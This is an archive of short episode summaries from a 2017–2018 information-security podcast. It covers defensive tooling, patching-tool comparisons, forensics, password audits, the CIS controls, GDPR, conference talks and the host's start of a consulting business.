As a continuation of last week's episode I'm now making a bit of progress in finding a good backup solution that protects USB backups both at rest and when pumped up to the cloud.I mentioned I've been using BackBlaze...
View this episode's show notes for more information
Published: Wednesday, June 13, 2018
You probably create DR plans for your business (or help other companies build them), but have you thought about creating one for yourself? Yeah, I know it's grim to think about "What will my loved ones do to get into my accounts, backups, photos, social media accounts..." but it's probably not a...
- A "here's how I run all our technology" Google doc with domains I have registered, their expiration date, what their function is, etc.
- A how-to guide on restoring data from our online backup solution
- Implementation of a password manager
View this episode's show notes for more information
Published: Thursday, June 07, 2018
IntroAs I was preparing for my Secure 360 talk a month or so ago, I stumbled upon this awesome article which details a method for getting Domain Admin access in just a few...
View this episode's show notes for more information
Published: Wednesday, May 30, 2018
IntroIt has been a heck of a week (in a good way), and I'm taking a break from security so you can help me untangle a mystery that's been wrapped around my brain for years. I need you to help me figure out what this dude meant when he said that something was as frustrating "as boxing a cat."P.S....
View this episode's show notes for more information
Published: Thursday, May 24, 2018
IntroThis week I dove into building a Cuckoo Sandbox for malware analysis. There are certainly a ton of posts and videos out there about it, but this entry called [Painless Cuckoo Sandbox Installation](https://blog.nviso.be/2018/04/12/painless-cuckoo-sandbox-...
View this episode's show notes for more information
Published: Friday, May 18, 2018
IntroAh, best laid plans rock. I had pre-recorded this episode on Monday (May 14th) so I could have it automatically released on Wednesday (May 16) but uh...I screwed it up. Siiiighhhh... anyway here's this week's episode:Last week I was in the recording studio to record three 7MS commercials...
View this episode's show notes for more information
Published: Wednesday, May 09, 2018
IntroCracking passwords in the cloud is super fun (listen to last week's episode to learn how to build your own cracking box on the cheap at Paperspace )!In the last couple weeks, customers have asked me about doing a password strength assessment on their Active...
- Extracts the hashes safely
- Parses down the dump to contain only the hashes (so that if somebody popped my Paperspace cloud-crackin' box, they'd have just a list of half-cracked hashes and that's it)
- Does the work pretty automagically
View this episode's show notes for more information
Published: Wednesday, May 02, 2018
IntroI had an absolute ball this week trying to figure out how to crack passwords effectively, and on the cheap, and in the cloud. Today's episode goes into much more detail, and below is the Gist of my approach thus far. If you've got things to add/suggest to this document, let me know!
View this episode's show notes for more information
Published: Wednesday, April 25, 2018
IntroHey, so this week I am without my main machine - thus no jingle or "jungle boogie" intro music. Feels weird. Feels real weird.Anyway, ya know how I teased last week that 7MS could possibly be coming to a radio station near you? Well I think it's more of a probability than a possibility at...
- Lots of people still listen to the radio (who knew?)
- Creating a "security minute" spot that would lead to a commercial about 7MS
- How to write a good commercial "hook"
- It's difficult to write a 60-second commercial!
- Targeted advertising at churches, which is an under-served market when it comes to infosec
- Writing a new (shortened) 7MS jingle
View this episode's show notes for more information
Published: Thursday, April 19, 2018
IntroWe've dug into some pretty technical topics the last few weeks so we're gonna take it easy today. Below are some FAQs and updates I'll cover on today's show:FAQsUpdatesDon't forget to check out these new and/or updated pages on BPATTY :Speaking engagements.
- What security certs should a sales person get?
- What lav mic should I get for podcasting?
- How do I know if I'm ready to take the OSCP?
- When are you gonna do some more YouTube videos?
- When will the PacktPub project be done?
- Caldera
- LAPS
- PwnedPasswords
- I learned that the Cryptolocker song was played as muzak for a security conference . That makes me LOL ;-)
- Those of you in Minneapolis/St. Paul are invited to join me for Blue Team on a Budget lunch and learn at Manny's - it's on May 3 and hosted by OneIdentity .
- I'll be at Secure360 on May 16 to give my Blue Team on a Budget talk at 9:30 a.m., and I'll also be hosting our pal Bjorn for his Twin Cities vs. OWASP Juice Shop workshop on May 17. Gonna be awesome - hope you can come to either event (or both!).
View this episode's show notes for more information
Published: Thursday, April 12, 2018
IntroToday is part two of evaluating endpoint solutions, where I primarily focus on Caldera which is an adversary simulation system that's really awesome! You can essentially setup a virtual attacker and cut it loose on some test machines, which is what I did...
View this episode's show notes for more information
Published: Thursday, April 05, 2018
IntroI've been super pumped about Troy Hunt 's Pwned Passwords project ever since it came out - especially when I saw a tweet about...
View this episode's show notes for more information
Published: Thursday, March 29, 2018
IntroI'm working on a fun project right now where I'm evaluating endpoint protection solutions for a client. They're faced with a choice of either refreshing endpoints to the latest gen of their current product, or doing a rip and replace with something else.I've spun up a standalone AD...
- Mimikatz tomfoolery
- Lateral attacks with Metasploit shells
- Egress port scanning (to find an acceptable outbound port for C2 or data exfil)
- Jacking around with various PowerShell scripts and commands
- RTA
- Atomic Red Team
View this episode's show notes for more information
Published: Thursday, March 22, 2018
IntroI've had a fun week with a mixed bag of security related stuff happening, so I thought I'd throw it all in a big stew and cook it up for today's episode. Here are the highlights:Bash bunny presoI had a fun opportunity this week to speak to some property managers about the threats the Bash...
- How BB can steal your wireless network pre-shared keys that are saved to your PC
- How BB can go into "Responder mode" to capture credentials
- From the comfort of my mom's basement I can steal all this stuff, have it emailed to me, then drive up to your parking lot and join your wifi network with valid network creds! Sneaky bunnies FTW!
View this episode's show notes for more information
Published: Thursday, March 15, 2018
IntroCredDefense is a freakin' sweet tool from the fine folks at Black Hills Information Security that does some really nifty things:Password filterLets say you use the out-of-the-box...
- 2017
- 2018
- 2019
- 2020
- 2021
- 2022
- Password
- P@ssw0rd
- P@$$w0rd
- January
- February
- etc...
View this episode's show notes for more information
Published: Friday, March 09, 2018
IntroIn today's continuation of last week's episode I'm continuing a discussion on using free tools to triage Windows systems - be they infected or just acting suspicious. Specifically, those tools include:.
- FTK Imager - does a dandy job of creating memory dumps and/or full disk backups of a live system. You can also make a portable version by installing FTK Imager on a machine, then copying the C:\Program Files\wherever\FTK Imager\lives to a USB drive. FTK on the go!
- Redline grabs a full forensics pack of data from a machine and helps you pick apart memory strings, network connections, event logs, URL history, etc. The tool helps you dig deep into the timeline of a machine and figure out "What the heck has this machine been doing from time X to Y?"
- DumpIt does quick n' dirty memory dumps of machines.
- Volatility allow you to, in a relatively low number of commands, determine if a machine has been up to no good. One of my favorite features is extracting malware right out of the memory image and analyzing it on a separate Linux VM with something like ClamAV.
View this episode's show notes for more information
Published: Wednesday, February 28, 2018
I had the privilege of creating a Windows System Forensics 101 course/presentation for a customer. The good/bad news is there is so much good information out there, it's hard to boil things down to just an hour.For the first part of the presentation, I focused on [Mark Russinovich's...
View this episode's show notes for more information
Published: Thursday, February 15, 2018
Last week I talked about how business has been going with the LLC. Today I answer some additional questions that I didn't have time to address:More on today's show!.
- How I'm finding leads/projects to work on (TLDR: I'm NOT sending 1TB of PDFs to people, spamming them, calling them endlessly or LinkedIn'ing everybody and their mom)
- The interesting conversations I'm having with customers who seem a little tired of the traditional pentest/assessment song and dance (spoiler alert: they're looking for people with solutions and who will actually help remediate the stuff in the report!)
- The training services I'm offering are getting a lot more interest than I expected - and I think that's due to some of the sessions being more technical, yet not as intense as, say, a SANS course or the OSCP.
View this episode's show notes for more information
Published: Thursday, February 08, 2018
Hey! So back in episode 287 I talked about how I was upgrading 7 Minute Security and turning it into an LLC. Since then I've gotten a lot of questions like "Hey, how do I start my own security company? What's it cost? How do you find business? Are you living in your mom's basement, or has 7MS...
- Faith - I'm a Christian and pray about this business constantly. In fact I learned really quickly how easy it is to brag about your rock-solid faith when everything is going fine. And then when suddenly the rug is pulled out from under you, you find what your faith is really made of!
- My wife - she's my biggest supporter and cheerleader. There was a moment a couple weeks ago where I was just frustrated with a bunch of big deals that were pending, and communication had kind of gone silent. That same day I was also offered a really attractive full-time position. I came home that night tired and headachy and frustrated and whined to my wife that maybe it would just be easier to take a full time job I wasn't 100% happy with - just so I could have the predictable salary again. She heard me out and then basically said "Hey, I love you, but suck it up! Nobody said this was going to be easy. Keep at it, I support you, you've got a great support system, and you'll succeed." And I kid you not, 24 hours later, three deals had closed and I felt like a champion.
- Financial advisor - we have a great "money guy" who helped us plan for moments like these, where income might be slower as I drum up business.
- Trusted advisors - I'm blessed to have a partner called InteProIQ that has been a sounding board for a zillion and one questions. Everything from helping me quote projects and set hourly rates to marketing plans and connecting me with other business owners and contacts.
- Form your LLC - I just Googled how to do it, and found a bunch of articles with good info. Basically I found my state's Web site hierarchy and within that was a place to register the LLC and grab an EIN for tax purposes.
- Bank accounts - I visited my local banker and setup work checking/savings/etc.
- Quickbooks - I use this to keep track of expenses, send out quotes, reconcile invoices, etc.
- Expensify - I use it to track receipts and mileage. They even give you an email address where you can forward receipts to and it'll work it's awesome OCR magic to automatically extract the vendor, charge and date. Awesome!
- Toggl - a free Web interface (and app) to track time for projects (if the client doesn't already have something they want me to use)
- Smartsheets - I use this both as a project management tool that clients can view and collaborate with me on, and as a big todo list of leads to follow up on.
- Office 365 - I use it for all my email, calendar and storage needs.
- Squarespace - I use them as a Web host. Yes I realize I could run a Digital Ocean droplet for $5/mo or some other hosting platform for 5 cents a year, but I want to completely offload all the uptime/updates and security to a reputable host with a great reputation. Squarespace has been awesome in that respect.
View this episode's show notes for more information
Published: Thursday, February 01, 2018
WEFFLES are delicious!WEFFLES stands for Windows Event Logging Forensic Logging Enhancement Services and is Microsoft's cool (and free!) console for responding to incidents and hunting threats. I had a chance to play with it in...
View this episode's show notes for more information
Published: Thursday, January 25, 2018
Today I'm excited to be joined by my friend and advisor Kevin Keane ( Twitter / LinkedIn ) who is a lawyer, blogger, keynote speaker, business advisor, and just all around great guy. Kevin and I sit down to talk...
- How SMBs can take some productive security baby steps
- How to get the most value out of your next security consultant engagement
- Can breaches ever be funny?
- What is the Trust Calculus?
- Do I need to care about GDPR ?
View this episode's show notes for more information
Published: Thursday, January 18, 2018
We're talkin' about GDPR today!GDPR in a nutshellGDPR, in a nutshell, is a set of legal regulations focused on the privacy of personal information for EU citizens - no matter where they are. Entities that store and/or process personal information about EU citizens must clearly explain to the...
- Consent: the individual has given clear consent for you to process their personal data for a specific purpose.
- Contract: the processing is necessary for a contract you have with the individual, or because they have asked you to take specific steps before entering into a contract.
- Legal obligation: the processing is necessary for you to comply with the law (not including contractual obligations).
- Vital interests: the processing is necessary to protect someone’s life.
- Public task: the processing is necessary for you to perform a task in the public interest or for your official functions, and the task or function has a clear basis in law.
- Legitimate interests: the processing is necessary for your legitimate interests or the legitimate interests of a third party unless there is a good reason to protect the individual’s personal data which overrides those legitimate interests. (This cannot apply if you are a public authority processing data to perform your official tasks.)
View this episode's show notes for more information
Published: Thursday, January 04, 2018
Back in episode 280 I talked about how I started working with PacktPub to start authoring a video course on vulnerability scanning using Kali.Since that episode I've found that recording and editing high quality...
- Record raw video using iShowU
- Pull that video into iMovie and cleanup all the mistakes
- Record audio in Quicktime
- Pull audio clips into iMovie and edit those to match up with what's happening in the video
- Export video as 1080p
- Resolution should be 1920x1080 (full HD) - I just bought a secondary monitor for this. Specifically, an HP 22cwa.
- I set my .bashrc file to use all white for the terminal prompt. See this article which helped me out.
- In Terminal I created a PacktPub profile that has font as Monospace Regular 20pt.
View this episode's show notes for more information
Published: Thursday, December 28, 2017
Hey folks, I had originally planned to cover the CredDefense toolkit but I couldn't get it working. I'm basically having the same issue that someone reported here . Sooooo....will...
View this episode's show notes for more information
Published: Thursday, December 21, 2017
Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week:This site ( http://www.auditscripts.com/free-resources/critical-security-controls/ ) offers awesome CSC-mapping...
- A spreadsheet with how the CSCs map to other popular frameworks like ISO and NIST
- A manual assessment tool for measuring your org - or someone else's org - against the CSCs. Flippin' sweet right? RIGHT!
View this episode's show notes for more information
Published: Thursday, December 14, 2017
My pal and former coworker Joe Klein joins me in the virtual studio to discuss:Other references made in the episode:Joe welcomes your comments, concerns, insults and questions via email (listen to today's episode for the address!) or...
- His career as a diesel mechanic and insurance guru
- How to leave a stable job, take a huge pay cut and start a risky infosec internship (sounds like the name of a broadway musical!)
- The start of his new career as a SOC analyst
- The importance of having a career cheerleader/mentor
- Being hungry for knowledge and certifications without being ashamed or afraid to look like a newb
- CompTIA Security+ and Cisco CCNA Cyber Ops certs
- The proper pronunciation of the word "dude"
- How to do a proper Arnold Schwarzenegger impression
- Arnold Schwarzenegger the love poet
View this episode's show notes for more information
Published: Thursday, December 07, 2017
Two weird things happening in this episode:I spent some time this last week getting back into Windows systems forensics, which has been really fun. If you want a play-by-play guide with some fantastic, practical, hands-on advice, grab yourself a copy of the [Blue Team Handbook: Incident Response...
- I'm not in the car, and thus not endangering myself and others while podcasting and driving!
- My once beloved lav mic made a trip through the Johnson family's washer and dryer. I don't know that she'll ever record anything again. We'll see once it fully dries out (fingers crossed).
View this episode's show notes for more information
Published: Friday, December 01, 2017
Mac High Sierra root bugDid you hear about this? Basically anybody could log in as user root on your system without a password because...there isn't a password! Read the Twitter thread where I originally read the news here , read about...
- In Burp, state files are being depreciated in favor of project files. Read more here .
- For BApp extensions, here are a few that help you get the job done:
- retire.js looks for old/outdated/vulnerable Javascript libraries
- Software vulnerability scanner helps you find vulnerable software, such as old versions of IIS
- CO2 has a bunch of tricks up its sleeve - my favorite of which is helping you craft sqlmap commands with the right flags
View this episode's show notes for more information
Published: Wednesday, November 22, 2017
Well, after over-teasing this last week, I'm excited to announce that I've started my own company! 7 Minute Security, LLC gives me an outlet to do all my favorite infosec stuff, such as:I welcome you to check out 7MinSec.com for more information. Or...
- Network assessments
- Vulnerability scanning
- Penetration testing
- Training
- Public speaking
View this episode's show notes for more information
Published: Thursday, November 16, 2017
We're continuing to hammer on the CSCs again this week. Here's some rad resources that can get your CSC efforts in the right direction:.
- CIS Implementation Guide for SMEs
- CIS Cybersecurity quarterly newsletters
- Netdisco lets you locate machines by MAC or IP, show the corresponding switch port, and disable it if necessary.
- Defensive Security Handbook isn’t specifically mapped to CSCs but offers great advice to tie into them.
- Open-Audit tells you what’s on your network, how it’s configured, and when it changes.
View this episode's show notes for more information
Published: Thursday, November 09, 2017
I've heard this song way too much this week.I love the CIS Controls but it seems like there isn't a real good hands-on implementation guide out there. Hrmm...maybe it's time to create one? Speaking of that,...
- Ability to map network devices to users to create an inventory
- Email alerts for new devices that pop up on the network
- Block unwanted users from the app, even when not directly connected to the LAN
- Nice set of troubleshooting tools, such as wifi throughput test, Internet speed test, and port scanning of LAN/WAN devices
View this episode's show notes for more information
Published: Thursday, November 02, 2017
For a long time I've been electronically in love with the Critical Security Controls . Not familiar with 'em? The CIS site describes them as:The CIS Controls are a prioritized set of actions that protect your critical systems and data from the most...
View this episode's show notes for more information
Published: Saturday, October 28, 2017
My plans for this week's podcast went hush-hush, kablooie, bye-bye, see ya, adios.So, I'm pinch-hitting and going off-topic and talking about...of all things...cops. Now wait! Wait wait! Don't run away. I'm not going all political on you or anything like that. Just wanna share some anecdotes and...
- What it was like growing up with a dad who was a cop
- Losing a cousin in the line of duty
- Getting a call from my local police department this week claiming I was a danger to a school bus full of kids. Whaaaaa?
- Oh, and I sing a little bit on this episode too.
View this episode's show notes for more information
Published: Thursday, October 19, 2017
I'm gonna level with you: it's been a heck of a week. So I thought I'd try something a little different (and desperate?) and use this episode to answer some FAQs that come in via email and Twitter DM. Today's burning questions include:Q: Do I think it's dangerous to podcast and drive?A: Not...
View this episode's show notes for more information
Published: Wednesday, October 11, 2017
I went to my first ever banking-focused infosec conference a few weeks ago ( WBA's Secure-IT ) and learned a ton.I met some really great people and had many productive conversations around...
- Standing all day and talking about security is exhausting!
- You can thwart "swag whores" (sorry mom, but I learned that that's what they're called!) by pushing your merch table deep into the booth so it's touching the rear curtain. That way people have to go through your "people perimeter" and engage in conversation with you in order to be granted access to the swag!
- From the conversations I had with the staff at these small banks, they're definitely wanting to slurp up as much helpful info from the sessions as possible. Specifically, finding ways to better improve security posture using free/cheap tools is ideal!
- I attended a few sessions that got my blood boiling. The outline of these talks went something like this (slight exaggeration added, but not much):
- Hackers are way smarter and more physically attractive than you, and they can get by all your defenses with ease
- You're helpless, hopeless, and not physically attractive
- Luckily we (Vendor X) are here and we offer our patented Super Solution Y that will thwart the APTs 100% of the time, no question, guaranteed
- People don't appreciate being talked down to, nor do they want to be shamed, blamed or scared into making security better.
View this episode's show notes for more information
Published: Thursday, October 05, 2017
I'm excited to announce I'm going to be a PacktPub author! I'm going to work with them to create a course on network/vulnerability scanning. I'm pumped, but kinda nervous, so when I had the initial conversations with PacktPub staff, I made sure I hit them with my burning...
View this episode's show notes for more information
Published: Thursday, September 28, 2017
The patching solutions review concludes this week with Ivanti 's patch solution, as well as PDQ Deploy/Inventory .As a quick reminder, here's where our bake-off currently sits:Quick reminder: none of these solutions are...
- Ninite (covered in 7MS #275 )
- ManageEngine (covered in 7MS #277 )
- Pretty easy to install and manage - even without a deep background in IT (in today's episode I tell a story that can back this claim based on my experience)
- Does a solid job of applying patching Windows OS and third party
- Pricing is a little steep - last figures I saw were ~$80 per server, per year and ~$40 per workstation, per year.
- ITScripts library (that allows for GPO-style policy enforcement) is a little slim when compared to similar functionality offered from other solutions
- Lets you crazy with building custom packages you can deploy to granular groups
- Awesome online help resources, including a YouTube video library that's got a video for just about everything
- Quick response to support tickets
- A bit more complicated to get comfortable with than the other solutions
- A little confusing on the Windows patching side - not quite as "point and patch" as some of the other solutions
- Agentless system - machines have to be able to "see" the PDQ
View this episode's show notes for more information
Published: Thursday, September 21, 2017
We're breaking ground with this episode, folks! For the first time in 7MS history, we've got a guest on the show (finally, right?!). Rob Sell is an IT manager who has been working in IT for many years, with a focus on information security specifically for the...
- Here's Rob's Defcon CTF audition video:
- EchoSec helps you see a geographical area at a certain point in time. According to the Web site, EchoSec is "the most comprehensive social sentiment tool on the market" - hmmmm, seems like a great SE tool!
- X-Ray is "a tool for recon, mapping and OSINT gathering from public networks."
- Michael Bazzell's Web site has online training, free tools and other goodies. Michael also has some books .
- Christopher Hadnagy has a podcast that's strictly focused on SE. He's also got some books .
- ArcGIS isn't necessarily labeled as an SE tool, but can certainly be used for SE efforts.
View this episode's show notes for more information
Published: Thursday, September 14, 2017
The patching solutions review continues this week with Manage Engine's Desktop Central . As a quick reminder, here's where our bake-off currently sits:Quick reminder: none of these solutions are bribing me with fat wads of cash to plug...
- Ninite (covered in 7MS #275 )
- ManageEngine (covered today)
- Ivanti (coming up in a future episode)
- PDQ (coming up in a future episode)
- Agent or agentless management of systems
- MDM (didn't play with it but it certainly looks feature-rich)
- Application white/blacklisting
- Ability to push out configurations for things you'd normally use GPOs for - i.e. setting a login banner, enforcing screen locks, setting IE homepage and search engine, etc.
- Patch management is full-featured - it's easy to setup a simple "scan systems, download and deploy missing patches." Or just a "scan to identify missing patches" kind of thing. It's easy to run a variety of reports to find out which systems are most vulnerable, which patches are missing across the enterprise, etc.
- Software deployment engine - there's a big package library where you can easily search and deploy things like Dropbox, Adobe Reader, etc. It also includes a self-service portal where users can simply select certain packages and have them installed automagically!
- Inventory - ability to have detailed hardware/software level details on each machine. Ability to block software by path and/or hash. You can also give people a warning saying "We're gonna nuke dropbox in 2 days if you keep it on here!"
- Agent-based install gives you ability to chat with users, remote control systems, send announcements, drop to a command line at a target machine, etc.
- Reports - you can create a report for just about anything under the sun like AD group changes, user logon reports, users that are disabled/expired, and on and on...
- Email alerts - I think you can trigger an email alert for just about ANYTHING that happens in the environment.
- Solid online help - nice "quick links" at the bottom of each screen with relevant how-tos, a good Kbase, and plenty of videos/FAQs.
- Pricing seems competitive - less than $1,000 for either pro or enterprise version. Enterprise has a few things pro doesn't, like 2FA.
- When you first get started with Desktop Central the interface is very chatty, screaming at you to "Go here to fix XYZ config, otherwise nothing will work!" kind of thing. But as annoying as that was, I realize it was a means to an end as the app is helping you get things setup right so that, you know, stuff actually works!
View this episode's show notes for more information
Published: Wednesday, September 06, 2017
This is it! The worldwide Internet debut of an original infosec-themed song called CryptoLocker'd, and as the name implies, it's about a CryptoLocker incident. Here's the quick back story:A few years ago a worked on an incident response where a user got phished with a promise of a free burrito...
View this episode's show notes for more information
Published: Wednesday, August 30, 2017
This episode continues our series on comparing popular patching solutions, such as:NiniteThis week I focused on Ninite , and here's the TLDR version:ProsConsPatching solutions bake-off gist:(This will be continually updated as I evaluate the various solutions).
- Ninite
- ManageEngine
- Ivanti
- PDQ
- Does one thing (third party patching) and does it really well
- Extremely affordable
- User interface is clean, simple and really easy to use/learn
- No "agentless" option - it's an agent or nothin'
- I'm not sure if Ninite has the brand name recognition and reputation to be accepted/respected by large companies
- I need to do more homework on how they pull down their packages...are they ripping apart packages and repackaging them at all? That could be a big avenue for side-loading icky stuff.
View this episode's show notes for more information
Published: Wednesday, August 23, 2017
I'm back from Vegas! My talk went really well and I'm excited to tell you about it in today's episode. First, some conference/trip highlights:During the ILTACON conference I attended a great talk by Don McMillan about how to infuse humor into your work...
View this episode's show notes for more information
Published: Thursday, August 17, 2017
I ran out of time in episode #272 to tell you about why preparing to be a speaker for ILTACON was way more stressful that preparing for Secure360 a few months ago. The main points of difference/stress were:.
- ILTA wanted to see PowerPoint deck progress weekly, whereas with Secure360 it was pretty much "Your talk is accepted - see you at the conference!"
- ILTA is going to show a "speaker slide" with bio a few minutes before the sessions starts. That way the session is focused on content (and probably avoids people who like to talk about themselves too much :-)
- ILTA requested my PowerPoint and handouts a few weeks before the session so they could put on their Web site for attendees to see. Although that put some pressure on me to get content done early, I think it's great because presumably some people at the talk will have screened the content and therefore be more tuned in.
View this episode's show notes for more information
Published: Thursday, August 17, 2017
This is part 2 of a series focusing on public speaking - specifically for the ILTACON conference happening in Vegas this week.In this episode I share a high-level walkthrough of my talk and the 10 "Blue Team on a Budget" tips that the talk will focus on. These...
- Turning up Windows auditing and PowerShell logging
- Installing Sysmon
- Installing Security Onion
- Don't put too much faith in endpoint protection
- Keep an eye on Active Directory
- Install RITA
- Deploy a Canary
- Use strong passwords
- Install LAPS
- Scan and patch all your things
View this episode's show notes for more information
Published: Thursday, August 10, 2017
Seems like every business I meet with needs some sort of help in the patching department. Maybe they've got the Microsoft OS side of the house under control, but the third-party stuff is lacking. Or vice-versa. Either way, the team I work with is excited to kick the tires of some popular patching...
- Ninite
- ManageEngine
- PDQ Deploy
- Cheap
- Does one thing, and does it well
- Been around for a long time
- Cloud-based - doesn't rely on LAN-side server
- Only cloud-based...no LAN-side option
- Requires an agent
- Agent's only purpose is patching - no extra bells/whistles like remote control or inventorying capability
View this episode's show notes for more information
Published: Thursday, August 03, 2017
I spent a bunch of time with Security Onion the last couple week's and have been lovin' it! I ran the install, took all the defaults, ran the updates, and pretty much just let it burn in on my prod (home) environment.After a few days, I went back to check the Security...
View this episode's show notes for more information
Published: Thursday, July 27, 2017
Documentation is super boring, right? Yet it's critical to getting your client/audience excited about making their security better!In this episode I talk about my mixed feelings towards the "big" standards like ISO/NIST/etc. and how a more tactical, down-to-earth documentation approach might be...
View this episode's show notes for more information
Published: Wednesday, July 19, 2017
Been having a blast working with the beta branch of the Sweet Security project and it anxious to try the latest fixes of the beta branch. Give it a look!I also spent a lot of time the last few nights playing with [Security...
- Run the soup command to update Security Onion with all the latest packages
- Use ufw to adjust the internal firewall to allow management from ports other than SSH (which is already preconfigured)
- On a side note, I think you might have to have your vnic in VMWare set to promiscuous mode in order to allow proper network sniffing.
- Do a wget http://testmyids.com to ensure Security Onion alerts are coming in the squil dashboard security alerts are pouring in.
View this episode's show notes for more information
Published: Tuesday, July 18, 2017
Today's episode is a horror story about how I recently lost 5+ years of CrashPlan backups due to what I'm calling a...small clerical error.Yes, this oopsie was 100% my fault, but I think backup providers can do a better job of warning us (via text or automated call rather...
View this episode's show notes for more information
Published: Thursday, July 13, 2017
This week I've continued to play with the awesome Sweet Security IDS solution you can throw on a Raspberry Pi 3. A big update to share is that there is a beta branch which has some cool new features, such as the ability to break the Bro + ELK stack...
View this episode's show notes for more information
Published: Wednesday, July 05, 2017
I've been wanting to get a Bro IDS installed for a long time now - and for several reasons:It looks fun!My customers have expressed interestIt will be part of my upcoming ILTACON session.So this weekend I started getting the...
- Ubiquiti Edge Router X (~$99)
- TP-Link TL-SG105E (~$35)
- CanaKit Raspberry Pi 3 Complete Starter Kit (~$70)
View this episode's show notes for more information
Published: Thursday, June 29, 2017
I was pleasantly surprised to see a Wordpress site fall into a pentest scope this past week. One helpful tool to get familiar with when attacking Wordpress sites is wpscan , which is built right into Kali - or you can grab it from...
- --throttle - for example, I've been using --throttle 1000 in order to be a bit less intense on my target site
- --request-timeout and --connect-timeout help your scan recover smoothly from site errors/timeouts
View this episode's show notes for more information
Published: Sunday, June 25, 2017
Tell me I can't be the only one who regularly wants to combine a bunch of small Nessus scans files into a big fat Nessus scan file, and then make pretty pictures/graphs/summaries that the customer can easily understand?Over the last few weeks I must've tried every Powershell and Python script I...
View this episode's show notes for more information
Published: Wednesday, June 14, 2017
Through kind of a weird series of events, I have an opportunity to speak at ILTACON this summer in Vegas (baby!). I'll be talking about some things you can do if you suspect your perimeter is breached, as well as low-hanging fruit you can implement to better...
View this episode's show notes for more information
Published: Wednesday, June 07, 2017
.
- The PwnPulse helps a ton in scanning wired and wireless networks...and even Bluetooth! I've covered the Pulse in past episodes - check out part 1 and part 2 .
- Network Detective will do a ton of helpful Active Directory enumeration and point out potential red flags, such as:
- Accounts that haven't been logged into for a long time
- Accounts with passwords that haven't been refreshed in a long time
- Privileged groups that need review (Domain Admins, Enterprise Admins, etc.)
- AD policy issues (*warning: by default Network Detective only pulls back a few policies by default. Check out scripts such as my Environment Check to grab a dump of all GPOs.
- Thycotic Privileged Account Discovery is a free tool that can crawl AD workstations and enumerate the local administrator accounts on each machine. It makes a good case for implementing LAPS .
View this episode's show notes for more information
Published: Friday, June 02, 2017
I'm continuing to love the our PwnPro and had a chance to use it on a customer assessment this week. For the most part the setup/install was a breeze. Just had a few hiccups that the Pwnie support team straightened me out on right...
View this episode's show notes for more information
Published: Thursday, May 25, 2017
Warning! Warning! This is an off-topic episode!I try really hard to create valuable weekly content about IT/security. However, sometimes a virtual grenade goes off in my life and prevents me from having the necessary time/resources to get my act together. This has been one of those weeks. :-)So...
View this episode's show notes for more information
Published: Thursday, May 18, 2017
I mentioned last week that I was speaking at the Secure360 conference here in the Twin Cities, and at that time I was preparing a talk called Pentesting 101: No Hoodie Required. I was so nervous that I've basically spent the...
- I'd not tempt the demo gods and still pre-record my hacking movies ahead of time. I saw some people do live demos of very technical things and it did not go well for a few of them :-(
- I would still spend way too many hours cutting together my movies in iMovie so that they followed a good tempo when presented live
- I would still have a copy of my presentation on two different laptops, 3 USB thumb drives, a cloud copy, and a copy sent to the Secure 360 folks just in case. Backups, backups, backups - am I right?
- I'd hopefully have the preso done a few days (weeks, even!) ahead of time and practice it in front of colleagues to get some feedback.
- I'd still have a theme to the presentation, but rather than something specific like Terminator 2, maybe I'd go even more general and pick a movie/character that could appeal even more to the masses.
- I wouldn't worry so much about having a presentation that "nails it" for everybody. That's just not possible! We're all coming from different backgrounds and skillsets. It's not gonna be a home run for everybody.
View this episode's show notes for more information
Published: Thursday, May 11, 2017
The nervous butterflies are chewing up my organs this week. Why? Because I'm speaking at Secure360 next Tuesday and [Wednesday](https://secure360.org/secure360-twin-...
- Appeals to both techie nerds like me, as well as regular human people
- Strikes a healthy balance between fun and informative
- Intros
- Lets talk about pentesting vs. vulnerability scans
- Build your own hackin' lab for $500!
- Good/bad training (CEH vs. OSCP)
- Lets hack some stuff following a methodology!
View this episode's show notes for more information
Published: Thursday, May 04, 2017
So a few weeks ago I did an episode about the AlienVault Certified Security Engineer certification, and last Friday I took a stab at the test.I failed. It kicked my butt.Today I'm...
View this episode's show notes for more information
Published: Thursday, April 27, 2017
I'm kicking the tires on the PwnPro which is an all-in-one wired, wireless and Bluetooth assessment and pentesting tool.Upon getting plugged into a network, it peers with a cloud portal and lets you assess and pentest from the comfort of your...
View this episode's show notes for more information
Published: Thursday, April 20, 2017
I've been working with the Bash Bunny for the past few weeks in preparation for a presentation/demo I'm doing in a few weeks. Today I want to talk about what the Bunny is, the cool things it can do, and some of my favorite payloads.Also, I started...
View this episode's show notes for more information
Published: Thursday, April 13, 2017
In the environmental/network hardening projects I've been working on the last few months, there are (at least) two common needs we are seeing:The ability to enumerate where service accounts are used throughout the environment. I wrote a...
View this episode's show notes for more information
Published: Thursday, April 06, 2017
Note: an updated episode on LAPS is available here: 7MS #523 Microsoft LAPS is a tool that allows you to randomize and strengthen the local administrator...
View this episode's show notes for more information
Published: Thursday, March 30, 2017
So a few weeks ago I discovered that my Ubiquiti ERX was not, contrary to how I thought I had it setup, functioning as a local DNS server on my network. I started a forum post about this issue...
View this episode's show notes for more information
Published: Thursday, March 23, 2017
Hey everybody, and thanks for supporting 250 episodes of 7 Minute Security! In today's episode I want to thank you for your encouragement and also talk about a new Patreon campaign I'm launching.The TLDR version is this: if you like the 7MS podcast, [documentation...
- 7MS stickers!
- Resume review to nail that next job
- Monthly Google Hangout hacking sessions!
- Live acoustic concert from Sweet Surrender (via the Interwebs)!
View this episode's show notes for more information
Published: Thursday, March 16, 2017
Hey friends! I'm training all week for the AlienVault Certified Security Engineer (ACSE) certification, and so far, so good!This episode kicks off a mini-series on the training, focusing on:.
- First impressions of the training format and supplemental PDFs, etc.
- My thoughts on the lab environment (and a few ways I think it could improve)
- A semi-major "gotcha" if you're going to utilize AlienVault as an MSSP (spoiler alert...there's more training to take)
View this episode's show notes for more information
Published: Thursday, March 09, 2017
I recently had a really cool opportunity to work with my boss and the local NBC news station to put together a story about the (in)security of wireless and ioT.This was my first experience working directly with a news team and I learned a lot about:How to hack on the fly :-)How to help craft a...
View this episode's show notes for more information
Published: Thursday, March 02, 2017
Today's battle for a Webapp pentest tool bake-off winner ends today with a brief look at...Qualys.
- I like that it has a suite of vuln-scanning tools somewhat in the vein of Rapid 7's family of products
- The Webapp scanner seems very functional, but interface is kind of cluttered and a little intimidating for newbs.
- I love their SSL Labs tool !
- The LAN-side version of their Webapp scanner is a downloadable VM rather than a package you can just install on a workstation machine.
- Pricing seems average-to-low in comparison with the other tools I evaluated (Appspider/Netsparker/Acunetix).
